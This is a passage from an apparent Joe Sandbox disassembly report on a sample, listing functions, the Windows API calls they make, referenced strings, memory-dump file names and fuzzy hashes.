GetStockObject.GDI32(00000005), ref: 005E2258
GetWindowDC.USER32(?,00000000), ref: 0061BE83
GetPixel.GDI32(00000000,00000000,00000000), ref: 0061BE90
GetPixel.GDI32(00000000,?,00000000), ref: 0061BEA9
GetPixel.GDI32(00000000,00000000,?), ref: 0061BEC2
GetPixel.GDI32(00000000,?,?), ref: 0061BEE2
ReleaseDC.USER32(?,00000000), ref: 0061BEED

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
String ID:
API String ID: 1946975507-0
Opcode ID: 0bbebc8f48dc398d12287f535f1cebc83e4cf992eb586b3b70e0656f67c87f7c
Instruction ID: b4270ed171b010dad4c9ff086bc7c98aa67f3ef3b6039f44798f224335ac305c
Opcode Fuzzy Hash: 0bbebc8f48dc398d12287f535f1cebc83e4cf992eb586b3b70e0656f67c87f7c
Instruction Fuzzy Hash: 7AE06D32504244EBDF215F64FC0D7D87F12EB16336F049366FA69880E187B24980DB12

Function 00638712 Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 0063871B
OpenThreadToken.ADVAPI32(00000000,?,?,?,006382E6), ref: 00638722
GetCurrentProcess.KERNEL32(00000028,?,?,?,?,006382E6), ref: 0063872F
OpenProcessToken.ADVAPI32(00000000,?,?,?,006382E6), ref: 00638736

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: CurrentOpenProcessThreadToken
String ID:
API String ID: 3974789173-0
Opcode ID: fa789c148387cbdf1de34d6058d1c80403d9163fe933fb98635e6a00f1a3ab45
Instruction ID: 730dd00a546ca6735405a0f5c61ba22c56ed30b04992de1265beb0191f5263ff
Opcode Fuzzy Hash: fa789c148387cbdf1de34d6058d1c80403d9163fe933fb98635e6a00f1a3ab45
Instruction Fuzzy Hash: 3EE04F36615312ABD7205FB16D0CB9A3BAEEF50791F145828F245DA040DA6488418B90

Function 005E6240 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 317COMMON

Download Yara Rule

Strings

%g, xrefs: 005E624E

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID:
String ID: %g
API String ID: 0-3742675072
Opcode ID: e35358a2e138fa819634354b1c50e02b3c01d6908a891a900056ba3c9c2eb6de
Instruction ID: bd86078afb66571fc3166795a06bc1e33e209a4b112145b9acfd8c3b4322515e
Opcode Fuzzy Hash: e35358a2e138fa819634354b1c50e02b3c01d6908a891a900056ba3c9c2eb6de
Instruction Fuzzy Hash: E9B1937580018A9BCF1CEF96C8859FEBFB5FF68390F144426E991A7191EB309E81C791

Function 0065AEA2 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 313COMMON

Download Yara Rule

APIs

__itow_s.LIBCMT ref: 0065AFAE

Strings

xbj, xrefs: 0065B010
xbj, xrefs: 0065AFE4

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: __itow_s
String ID: xbj$xbj
API String ID: 3653519197-1531641965
Opcode ID: 3cdc52b2c5009e65da5049f73ce6ea1ee362ee061d3efab5b571be6f911540fe
Instruction ID: 82389af43e53d97ec2f287524874c4eacbb0988c750f51d3853edce0cc4a3a04
Opcode Fuzzy Hash: 3cdc52b2c5009e65da5049f73ce6ea1ee362ee061d3efab5b571be6f911540fe
Instruction Fuzzy Hash: ADB17C70A0014AAFCB24DF55C895EEABBBAFF49301F148159FD459B291EB30E945CB60

Function 0064AFAC Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 201shareCOMMON

Download Yara Rule

APIs

Part of subcall function 005FFC86: _wcscpy.LIBCMT ref: 005FFCA9

Part of subcall function 005E9837: __itow.LIBCMT ref: 005E9862
Part of subcall function 005E9837: __swprintf.LIBCMT ref: 005E98AC

__wcsnicmp.LIBCMT ref: 0064B02D
WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 0064B0F6

Strings

LPT, xrefs: 0064B027

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
String ID: LPT
API String ID: 3222508074-1350329615
Opcode ID: dbb795294f93a9123f093df6b3cb7c571d0356faf88fa99bee5401565376c447
Instruction ID: c128b182d26b202048800d01f16ab51ff69325f82f9394661667d5b00ab3a8cd
Opcode Fuzzy Hash: dbb795294f93a9123f093df6b3cb7c571d0356faf88fa99bee5401565376c447
Instruction Fuzzy Hash: 1B618C71A00219AFCB18DF94C895EEEB7B6EF48710F105069F956AB3A1D770EE41CB90

Function 005F2957 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000), ref: 005F2968
GlobalMemoryStatusEx.KERNEL32(?), ref: 005F2981

Strings

@, xrefs: 005F2975

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: GlobalMemorySleepStatus
String ID: @
API String ID: 2783356886-2766056989
Opcode ID: 45438f9ed025698a71d33aacbe4caf0600b657c47ab29d17bc10ff3d319db39b
Instruction ID: f1e8741e802cd14d4b8cfde948f50254cdac1c608954d0028f07d2965217b002
Opcode Fuzzy Hash: 45438f9ed025698a71d33aacbe4caf0600b657c47ab29d17bc10ff3d319db39b
Instruction Fuzzy Hash: 76513771408785ABD720EF11D88ABABBBECFBC5344F42885DF2D8410A1DF708529CB66

Function 00649734 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138COMMON

Download Yara Rule

APIs

Part of subcall function 005E4F0B: __fread_nolock.LIBCMT ref: 005E4F29

_wcscmp.LIBCMT ref: 00649824
_wcscmp.LIBCMT ref: 00649837

Strings

FILE, xrefs: 00649770

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: _wcscmp$__fread_nolock
String ID: FILE
API String ID: 4029003684-3121273764
Opcode ID: 3392ca09ed2f3c2eed6b2df7fac94c33eac8f71645ae3a1b9e9a4d4c4e4a4c8f
Instruction ID: 29d30e09d226052b139546666da82dabe1c3e06d2fa99c84e8fb289c2418577a
Opcode Fuzzy Hash: 3392ca09ed2f3c2eed6b2df7fac94c33eac8f71645ae3a1b9e9a4d4c4e4a4c8f
Instruction Fuzzy Hash: 3F41EB31A4021ABADF259FA5CC49FEFBBBEEF86710F000469F904E7280D67199048B65

Function 00620574 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 115COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 0062057F

Strings

Ddj, xrefs: 005EA151
Ddj, xrefs: 005EA317

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: ClearVariant
String ID: Ddj$Ddj
API String ID: 1473721057-2583336740
Opcode ID: b925920e640bc42c9ebf5e4db23e20a28c84207eacab8b820cf8858958a8dd3a
Instruction ID: d329fe4a609695838eecb4a5973f0d331c867481a075a5a2e5858fdc95af866b
Opcode Fuzzy Hash: b925920e640bc42c9ebf5e4db23e20a28c84207eacab8b820cf8858958a8dd3a
Instruction Fuzzy Hash: CB51C0786083818FD758DF2AC584A1ABBF2BB99354F54885CF9858B361D331EC81CF42

Function 0065258E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97networkCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0065259E
InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 006525D4

Strings

|, xrefs: 006525A5

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: CrackInternet_memset
String ID: |
API String ID: 1413715105-2343686810
Opcode ID: 35e3a049d774faf072e5580086979f92264f56c855fc205dc47d4f6197bccdcc
Instruction ID: 2b4875ddf22ec6ca6c29a54d36122d5a8c03f7605f093cfce529e70aac30eb81
Opcode Fuzzy Hash: 35e3a049d774faf072e5580086979f92264f56c855fc205dc47d4f6197bccdcc
Instruction Fuzzy Hash: 3E31167180015AABCF05AFA1CC99EEEBFB9FF09310F100069FD55A6262EB315956DB60

Function 00667A71 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001132,00000000,?), ref: 00667B61
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00667B76

Strings

', xrefs: 00667ACA

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: MessageSend
String ID: '
API String ID: 3850602802-1997036262
Opcode ID: ec8fa68e1433eba05918d5af6547048c5615d1f69c1324317a2c0943b5687520
Instruction ID: 0cb41763cb863e8d4ab537fb9b54eefcc59c4bb34f9bb41736a0320aa9bfd27f
Opcode Fuzzy Hash: ec8fa68e1433eba05918d5af6547048c5615d1f69c1324317a2c0943b5687520
Instruction Fuzzy Hash: C8411974A0530A9FDB14CFA4C881BEABBB6FF09304F10016AE905EB395E771A951CF90

Function 00666A63 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?,?), ref: 00666B17
MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00666B53

Strings

static, xrefs: 00666AB3

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: Window$DestroyMove
String ID: static
API String ID: 2139405536-2160076837
Opcode ID: e923fef65260b85caaac6355c7a28e44037ab15ff19a40652f20f66e4b3b702c
Instruction ID: a1260d208e1424ae097cbd6b7c1ab29f49aebf59cd03cd3086d6a4b043e26e58
Opcode Fuzzy Hash: e923fef65260b85caaac6355c7a28e44037ab15ff19a40652f20f66e4b3b702c
Instruction Fuzzy Hash: 3431AF71200604EEDB109F65DC80BFB77AAFF88760F10961DF9A5D7290DA71AC91CB60

Function 006428A2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00642911
GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 0064294C

Strings

0, xrefs: 0064290A

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: InfoItemMenu_memset
String ID: 0
API String ID: 2223754486-4108050209
Opcode ID: 2d42ddcdd103945ec8a1bb171577e8ddf5bdc063e2444caa561f0e9f6c6a839f
Instruction ID: dc8ecf72751a08325b63967699787c33e21cc2345357fdd0d88c3d37613e2dd3
Opcode Fuzzy Hash: 2d42ddcdd103945ec8a1bb171577e8ddf5bdc063e2444caa561f0e9f6c6a839f
Instruction Fuzzy Hash: 6931D531A00307DFEB28DF5AC895BEEBBB6EF45350F640019F985A62A0D7709D44CB51

Function 006666D4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00666761
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0066676C

Strings

Combobox, xrefs: 0066672E

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: MessageSend
String ID: Combobox
API String ID: 3850602802-2096851135
Opcode ID: 887f8a3e3dcf483fdc71f0eae99b878d519c3a6ed228d7cf6382c7859a5c2516
Instruction ID: 0975570b2d61574bb431464960834f20040429660e23fa9093c53b253fb68630
Opcode Fuzzy Hash: 887f8a3e3dcf483fdc71f0eae99b878d519c3a6ed228d7cf6382c7859a5c2516
Instruction Fuzzy Hash: 2C119071200208BFEF119F54EC80EEB3B6BEB88368F110129F91497290D6719C5187A0

Function 00666C07 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON

Download Yara Rule

APIs

Part of subcall function 005E1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 005E1D73
Part of subcall function 005E1D35: GetStockObject.GDI32(00000011), ref: 005E1D87
Part of subcall function 005E1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 005E1D91

GetWindowRect.USER32(00000000,?), ref: 00666C71
GetSysColor.USER32(00000012), ref: 00666C8B

Strings

static, xrefs: 00666C4E

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: Window$ColorCreateMessageObjectRectSendStock
String ID: static
API String ID: 1983116058-2160076837
Opcode ID: ced01894a1890fad7931fc8f5a40b2a04fbbec072c9fc6bd691851dce92dcdd9
Instruction ID: 7108f0c2795dc9ae099345590bdd04690bc36cefc534bd453db6c0555f9c539a
Opcode Fuzzy Hash: ced01894a1890fad7931fc8f5a40b2a04fbbec072c9fc6bd691851dce92dcdd9
Instruction Fuzzy Hash: 3E21567261020AAFDF04DFA8DC45AFA7BAAFB08304F005628F996E2250D675E850DB60

Function 00666920 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON

Download Yara Rule

APIs

GetWindowTextLengthW.USER32(00000000), ref: 006669A2
SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 006669B1

Strings

edit, xrefs: 00666986

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: LengthMessageSendTextWindow
String ID: edit
API String ID: 2978978980-2167791130
Opcode ID: b7864b27f687b8c6afa6f6f2660c2b15d5ca3f97edef44c6ffbac8145899c6a2
Instruction ID: 6b59e63a95c06de0f12c062fb7acfecea967016092efc27ed0300d5f23525922
Opcode Fuzzy Hash: b7864b27f687b8c6afa6f6f2660c2b15d5ca3f97edef44c6ffbac8145899c6a2
Instruction Fuzzy Hash: A2118F71500106ABEB109F74EC44AEB3B6BEB05374F504724FDA5A72E0C771EC519B60

Function 006429AF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00642A22
GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00642A41

Strings

0, xrefs: 00642A18

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: InfoItemMenu_memset
String ID: 0
API String ID: 2223754486-4108050209
Opcode ID: 55946d57f50de829209fe4b208a9aad9fe1a987f1d0cced05b14dd8aec60b5a9
Instruction ID: a62e1bba7d5522e554dbc3e3c23907631a1b4313271b5df840505226b397c433
Opcode Fuzzy Hash: 55946d57f50de829209fe4b208a9aad9fe1a987f1d0cced05b14dd8aec60b5a9
Instruction Fuzzy Hash: A011D332901116ABCB30EF98D854BDAB7BAAB46304FA44021FD56E7390D770AD86C791

Function 006521D6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62networkCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0065222C
InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00652255

Strings

<local>, xrefs: 0065221D

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: Internet$OpenOption
String ID: <local>
API String ID: 942729171-4266983199
Opcode ID: cdc7f501b7c08a05a2aaca96dc05af3770d9a10eef8e348fd9e534895ad2154c
Instruction ID: bf193211a3de42aa3637e50ca9d1cbf17c0f9a612e891577f811579243b11da0
Opcode Fuzzy Hash: cdc7f501b7c08a05a2aaca96dc05af3770d9a10eef8e348fd9e534895ad2154c
Instruction Fuzzy Hash: 05110674501226BADB248F119CA4EF7FFAEFF17352F10822AFD1486500D2705A89D6F0

Function 005F092D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52COMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,005E3C14,006A52F8,?,?,?), ref: 005F096E

Part of subcall function 005E7BCC: _memmove.LIBCMT ref: 005E7C06

_wcscat.LIBCMT ref: 00624CB7

Strings

Sj, xrefs: 005F09AE

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: FullNamePath_memmove_wcscat
String ID: Sj
API String ID: 257928180-3636466253
Opcode ID: 269e4b7e308abbacb6606f9837b015a79dd839c2ef15f46a0100477c5466f8bd
Instruction ID: 0ec532aae9565dc3a3353caa2c0dcc9edf32a3f5e30fa30845997f81fef11933
Opcode Fuzzy Hash: 269e4b7e308abbacb6606f9837b015a79dd839c2ef15f46a0100477c5466f8bd
Instruction Fuzzy Hash: D211E93190021EAACB40FB64CD05EDD7BE9BF48350B0454A5BA85D32C2FAF0AA844B10

Function 00638E05 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON

Download Yara Rule

APIs

Part of subcall function 005E7DE1: _memmove.LIBCMT ref: 005E7E22

Part of subcall function 0063AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0063AABC

SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00638E73

Strings

ComboBox, xrefs: 00638E12
ListBox, xrefs: 00638E3D

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

